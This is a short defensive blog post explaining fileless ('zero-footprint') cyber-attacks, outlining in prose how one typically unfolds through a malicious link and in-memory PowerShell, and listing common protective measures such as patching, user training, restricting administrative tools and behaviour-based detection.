Protecting Your System from Zero-Footprint Cyber-Attacks
Cybercriminals are continually on the lookout for ways to attack your system without being detected. An increasingly common tactic is the zero-footprint attack, also known as a fileless, or macro attack. This type of attack does not install software on a computer, so many antivirus tools are likely to miss it. Reports indicate that zero-footprint attacks are ten-times more likely to succeed than file-based attacks and they estimate that over 75% of successful compromising cyberattacks in 2017 were fileless.
Zero-footprint attacks evade whitelisting by taking advantage of applications that are already installed on the system and are on the approved whitelist. These attacks typically rely on a user to click a suspicious link or open a malicious file; however, they don’t need to install detectable files on a computer’s hard drive to compromise the system. Instead, they run malicious code or launch scripts that infect endpoints directly from memory, without leaving easily-discoverable artifacts behind.
Anatomy of a Zero-Footprint Attack
Here’s an example of how a zero-footprint attack works:
- A user clicks a link to a malicious website.
- The website loads Flash.
- Flash is used to open the Windows PowerShell utility.
- PowerShell downloads a script from a server and executes the script through the command line while operating in memory.
- The PowerShell script locates the user’s critical data and sends it to the attacker.
Detecting Zero-Footprint Attacks
Fortunately, the zero-footprint moniker is a misnomer. There are ways to detect malware even if it isn’t installed on your file system. Some antivirus software can spot the malicious attachment or link, even when there is no executable file installed. However, zero-footprint malware is hidden in RAM, and many antivirus programs only analyze the digital signatures of files stored on a hard drive to identify malicious files; they do NOT inspect memory directly, so fileless attacks often go undetected for a longer period of time.
Combatting Zero-Footprint Attacks
Here are some basic precautions you can follow to help secure your system and prevent zero-footprint attacks:
- Apply all the latest security updates and patches to your operating system, and ensure that all software applications are patched and updated to their latest version
- Educate your users on the dangers of downloading email attachments or clicking on suspicious links
- Restrict access to administrative tools like WMI, PowerShell, and Apple Script, that cybercriminals can leverage for attacks
- Restrict the number of domain administrators who have full access to domain settings
- Harden your firewalls, endpoint protection, email security, and web blockers
- Employ behavioral-based network security that enforces rules based on user’s actions and does not rely on signature-based malware detection.
No system for combatting zero-footprint attacks is foolproof; however, vigilance and robust threat prevention tools, can slow down or derail cyberattackers and increase the probability they will make mistakes that expose their presence or reveal their attack vector.
